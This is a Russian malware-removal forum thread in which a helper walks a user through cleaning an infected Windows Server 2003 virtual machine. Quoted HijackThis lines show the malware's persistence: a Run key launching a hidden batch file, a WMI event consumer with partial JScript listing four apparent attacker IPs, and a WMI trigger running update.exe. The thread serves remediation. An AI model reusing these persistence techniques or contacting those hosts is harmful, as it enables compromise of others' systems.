Показано с 1 по 11 из 11.

Помогите избавиться от вируса (заявка № 223804)

  1. #1
    Junior Member Репутация
    Регистрация
    15.10.2019
    Сообщений
    20
    Вес репутации
    17

    Помогите избавиться от вируса

    Здравствуйте!
    Пожалуйста помогите избавиться от вируса.
    Последний раз редактировалось thyrex; 20.10.2019 в 06:42.

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Cyber Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Info_bot
    Регистрация
    11.05.2011
    Сообщений
    2,287
    Вес репутации
    378
    Уважаемый(ая) harkovaa, спасибо за обращение на наш форум!

    Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

    information

    Информация

    Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.





    Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

  4. #3
    Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    11.11.2007
    Сообщений
    4,210
    Вес репутации
    155
    Здравствуйте!

    "Пофиксите" в HijackThis:
    Код:
    O4 - HKLM\..\Run: [BGClients] = C:\WINDOWS\system32\cmd.exe /c start /min c:\windows\system32\wbem\123.bat
    O25 - WMI Event: fuckyoumm_consumer - fuckyoumm_filter - var toff=3000;var fso=new ActiveXObject("Scripting.FilesystemObject");var http=new ActiveXObject("Msxml2.ServerXMLHTTP");if(!fso.FileExists('wpd.xml')){var f=fso.CreateTextFile('wpd.xml',2);f.writeLine('69.30.200.178'+'\r\n'+'45.116.13.219'+'\r\n'+'150.107.76.227'+'\r\n'+'103.213.246.23');f.Close();(2702 bytes)
    O25 - WMI Event: msupdate - CLASS_FIRST_TEST - Event="__InstanceModificationEvent WITHIN 300 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'", Set objShell = CreateObject("WScript.Shell")¶ objShell.Run "C:\WINDOWS\system32\update.exe"¶
    Перезагрузите компьютер вручную и сделайте повторные логи по правилам. (CollectionLog)

  5. #4
    Junior Member Репутация
    Регистрация
    15.10.2019
    Сообщений
    20
    Вес репутации
    17
    Цитата Сообщение от Sandor Посмотреть сообщение
    Здравствуйте!

    "Пофиксите" в HijackThis:
    Код:
    O4 - HKLM\..\Run: [BGClients] = C:\WINDOWS\system32\cmd.exe /c start /min c:\windows\system32\wbem\123.bat
    O25 - WMI Event: fuckyoumm_consumer - fuckyoumm_filter - var toff=3000;var fso=new ActiveXObject("Scripting.FilesystemObject");var http=new ActiveXObject("Msxml2.ServerXMLHTTP");if(!fso.FileExists('wpd.xml')){var f=fso.CreateTextFile('wpd.xml',2);f.writeLine('69.30.200.178'+'\r\n'+'45.116.13.219'+'\r\n'+'150.107.76.227'+'\r\n'+'103.213.246.23');f.Close();(2702 bytes)
    O25 - WMI Event: msupdate - CLASS_FIRST_TEST - Event="__InstanceModificationEvent WITHIN 300 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'", Set objShell = CreateObject("WScript.Shell")¶ objShell.Run "C:\WINDOWS\system32\update.exe"¶
    Перезагрузите компьютер вручную и сделайте повторные логи по правилам. (CollectionLog)
    Пофиксил.
    Последний раз редактировалось harkovaa; 17.10.2019 в 09:09.

  6. #5
    Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    11.11.2007
    Сообщений
    4,210
    Вес репутации
    155
    Вы не описали как внешне проявляется. Что сейчас с проблемой?

  7. #6
    Junior Member Репутация
    Регистрация
    15.10.2019
    Сообщений
    20
    Вес репутации
    17
    Цитата Сообщение от Sandor Посмотреть сообщение
    Вы не описали как внешне проявляется. Что сейчас с проблемой?
    Сильно тормозит система. Постоянные оповещения антивируса об опасных объектах. При санировании Dr.Web CureIt! и Касперский VRT постоянно обнаруживаются вирусы, лечатся но после перезапуска появляются вновь, при сканировании с загрузочной флешки не нахотятся вирусы вообще. При попытке жесткого удаления прекращается отправка исходящих пакетов по сети.
    Снимок экрана 2019-10-16 в 13.58.19.jpg

  8. #7
    Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    11.11.2007
    Сообщений
    4,210
    Вес репутации
    155
    Это продолжается и сейчас?
    Если да:
    Скачайте Malwarebytes' Anti-Malware. Установите и запустите.
    На вкладке "Проверка" - "Полная проверка" нажмите кнопку "Начать проверку". Дождитесь окончания проверки.
    Самостоятельно ничего не удаляйте!!!
    Нажмите кнопку "Сохранить результат - Текстовый файл (*.txt)". Имя сохраняемому файлу дайте любое, например, "scan".
    Отчёт прикрепите к сообщению.

  9. #8
    Junior Member Репутация
    Регистрация
    15.10.2019
    Сообщений
    20
    Вес репутации
    17
    При попытке установки выдается такое диалоговое окно.

    Цитата Сообщение от Sandor Посмотреть сообщение
    Это продолжается и сейчас?
    Если да:
    Скачайте Malwarebytes' Anti-Malware. Установите и запустите.
    На вкладке "Проверка" - "Полная проверка" нажмите кнопку "Начать проверку". Дождитесь окончания проверки.
    Самостоятельно ничего не удаляйте!!!
    Нажмите кнопку "Сохранить результат - Текстовый файл (*.txt)". Имя сохраняемому файлу дайте любое, например, "scan".
    Отчёт прикрепите к сообщению.
    Изображения Изображения

  10. #9
    Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    11.11.2007
    Сообщений
    4,210
    Вес репутации
    155
    Ах, да, на 2003 эта версия не поставится.

    Сделайте полный образ автозапуска uVS, только программу скачайте отсюда

    - - - - -Добавлено - - - - -

    p.s.
    Вам необходимо лечить именно виртуальную машину? Вариант переустановить не рассматривается?

  11. #10
    Junior Member Репутация
    Регистрация
    15.10.2019
    Сообщений
    20
    Вес репутации
    17
    Сделал
    Цитата Сообщение от Sandor Посмотреть сообщение
    Ах, да, на 2003 эта версия не поставится.

    Сделайте полный образ автозапуска uVS, только программу скачайте отсюда

    - - - - -Добавлено - - - - -

    p.s.
    Вам необходимо лечить именно виртуальную машину? Вариант переустановить не рассматривается?
    Именно лечить. К сожалению переустановка не возможна по определенным причинам.
    Последний раз редактировалось thyrex; 20.10.2019 в 06:43.

  12. #11
    Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    11.11.2007
    Сообщений
    4,210
    Вес репутации
    155
    Вы собрали отчет Автологером, а я просил нечто другое.

Похожие темы

  1. Ответов: 7
    Последнее сообщение: 04.01.2015, 23:19
  2. Помогите избавиться от вируса
    От Mike_Revda в разделе Помогите!
    Ответов: 11
    Последнее сообщение: 22.02.2009, 03:52
  3. Помогите избавиться от вируса !!!
    От alexrub в разделе Помогите!
    Ответов: 10
    Последнее сообщение: 22.02.2009, 02:36
  4. Помогите избавиться от вируса !!!!
    От alexrub в разделе Помогите!
    Ответов: 1
    Последнее сообщение: 10.10.2007, 20:16
  5. помогите избавиться от вируса lsass exe
    От nissn в разделе Помогите!
    Ответов: 11
    Последнее сообщение: 02.10.2006, 14:14

Свернуть/Развернуть Ваши права в разделе

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Page generated in 0.00164 seconds with 18 queries